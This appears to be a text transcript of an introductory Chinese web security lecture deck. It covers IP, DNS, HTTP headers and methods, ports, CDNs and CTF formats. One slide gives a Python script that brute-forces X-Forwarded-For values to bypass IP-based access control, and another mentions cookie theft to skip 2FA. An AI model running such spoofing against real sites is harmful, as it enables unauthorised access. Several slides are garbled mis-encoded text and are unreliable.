Upgrade to Pro — share decks privately, control downloads, hide ads and more …

ITAC | Websec 1

racterub
October 13, 2020

ITAC | Websec 1

ITAC | Websec 1

racterub

October 13, 2020
Tweet

More Decks by racterub

Other Decks in Research

Transcript

  1. •元智大學 電通英專大二 •常用 ID:Racterub / Racter •2017-2019 AIS3 學員 •2019

    台灣好厲駭 學員 •2020 ⺠生物聯網漏洞挖掘競賽 第二期第三名 •2020 Zyxel 榮耀資戰 第三名 About Me
  2. IP

  3. • 10.0.0.0/8 ? • CIDR • 主要在分配 IP 的辣 •

    例如元智在學術網路分配到的是 140.138.0.0/16 IP
  4. DNS

  5. DNS

  6. DNS

  7. DNS

  8. HTTP Header (Request) GET / HTTP/1.1 Host: racterub.me User-Agent: Mozilla/5.0

    (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html, Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, de!"ate Connection: close Upgrade-Insecure-Requests: 1 HTTP Method 請求方式
  9. HTTP Header (Request) Request Path 資源位置 GET / HTTP/1.1 Host:

    racterub.me User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html, Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, de!"ate Connection: close Upgrade-Insecure-Requests: 1
  10. HTTP Header (Request) HTTP 協定版本 1.1 1.2 2 GET /

    HTTP/1.1 Host: racterub.me User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html, Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, de!"ate Connection: close Upgrade-Insecure-Requests: 1
  11. HTTP Header (Request) ਂ玲翕ᒊऒݷ (domain/IP + port) GET / HTTP/1.1

    Host: racterub.me User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html, Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, de!"ate Connection: close Upgrade-Insecure-Requests: 1
  12. HTTP Header (Request) አෝ蜣獨֢禂羬翄޾ਮ䜛ᒒ(倵薩瑊) GET / HTTP/1.1 Host: racterub.me User-Agent:

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html, Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, de!"ate Connection: close Upgrade-Insecure-Requests: 1
  13. HTTP Header (Response) HTTP/1.1 200 OK Server: nginx Date: Sun,

    27 Sep 2020 10:44:42 GMT Content-Type: text/html; charset=utf-8 Last-Modified: Tue, 04 Aug 2020 16:24:02 GMT Connection: close ETag: W/"5f298ba2-8a3" Content-Length: 2211 <!DOCTYPE HTML> !!% Status Code
  14. HTTP Header (Response) HTTP/1.1 200 OK Server: nginx Date: Sun,

    27 Sep 2020 10:44:42 GMT Content-Type: text/html; charset=utf-8 Last-Modified: Tue, 04 Aug 2020 16:24:02 GMT Connection: close ETag: W/"5f298ba2-8a3" Content-Length: 2211 <!DOCTYPE HTML> !!% Response Header
  15. HTTP Header (Response) HTTP/1.1 200 OK Server: nginx Date: Sun,

    27 Sep 2020 10:44:42 GMT Content-Type: text/html; charset=utf-8 Last-Modified: Tue, 04 Aug 2020 16:24:02 GMT Connection: close ETag: W/"5f298ba2-8a3" Content-Length: 2211 <!DOCTYPE HTML> !!% ෈๜獉਻
  16. •GET: 向指定的資源發出顯示請求 •POST: 向指定資源提交資料 •OPTIONS: 這個方法可使伺服器傳回該資源所支援的所有HTTP請求方 法 •HEAD: 和 GET

    雷同,但不回傳文本內容 •PUT: 向指定資源位置上傳其最新內容 •DELETE: 請求伺服器刪除Request-URI所標識的資源 •CONNECT: 預留給能夠將連接改為隧道方式的代理伺服器。(HTTP 1.1) •TRACE: 回顯伺服器收到的請求,主要用於測試或診斷 HTTP Method
  17. • 200 : ౮ۑ • 300 : 旉࣎ • 400

    : አ䜛ᒒ梊藮 • 500 : ֑๐ᒒ梊藮 HTTP 制眲嘨
  18. • ਧ嬝ࣁ TCP/IP 愊ᶎ • Port 塅瑻ࣁ 1 ~ 65535

    • ࣁ IANA 磪ਧ嬝Ӟ犚 Port ጱአ蝝
 (֕ฎ User ݢ犥ᛔ懪) Ports
  19. • 21: FTP • 22: SSH • 23: Telnet •

    80: HTTP • 443: HTTPS • 3306: MySQL • 3389: RDP Ports
  20. •CDN •同樣只有一台 Server,但是透過 CDN 可以對 Server 的 靜態資源進行緩存,並且 CDN 機房是遍佈各地的

    •優點: •減少 Server 負擔,縮短用戶端和 Server 的距離 •缺點: •你在 Server 更新資料,可能 CDN 的邊緣主機尚未取 的最新資料 CDN
  21. Real Case (Y*utu*e) ੂ嘨硬ധ牏2FA 犖ᤩ硬ധ 蝡圵硭䢗ࣁ FaceBook ޾ Google ᮷ฎݢᤈጱ硭䢗ොဩ

    疪ٌฎ FaceBook 牧च๜Ӥݝᥝ೭ک Cookie 疰ݢ犥ࣁ犨 ֜襎脲ጭ獈֦ጱ癱蒈
  22. Real Case (IP) access = [] for i in range(256):

    time.sleep(1) for j in range(256): ip = f"192.168.{i}.{j}" print(f"[-] Testing {ip}") headers = {"X-Forwarded-For": ip, "User-Agent": UA} try: r = requests.get(URL, headers=headers) except: time.sleep(5) r = requests.get(URL, headers=headers) if ("WARNING" not in r.text): print(f"[+] Found : {ip}") access += ip
  23. • 薹氂ࣳ • AIS3 EOF CTF • Attack & Defense

    翕獉԰಑ࣳ • HITCON CTF Finals • King of the Hill 㬟覿秚瑊ࣳ • ݳ۪ 禛聱虻䜗 (CDX) CTF
  24. • 抓纷 • 纷ୗਞ獊 (NTU, NCTU, NTUST, NCU) (犋獍樄) •

    Bamboofox (NCTU) • NISRA (FJU) • NTUST ISC 硽䋊虻რ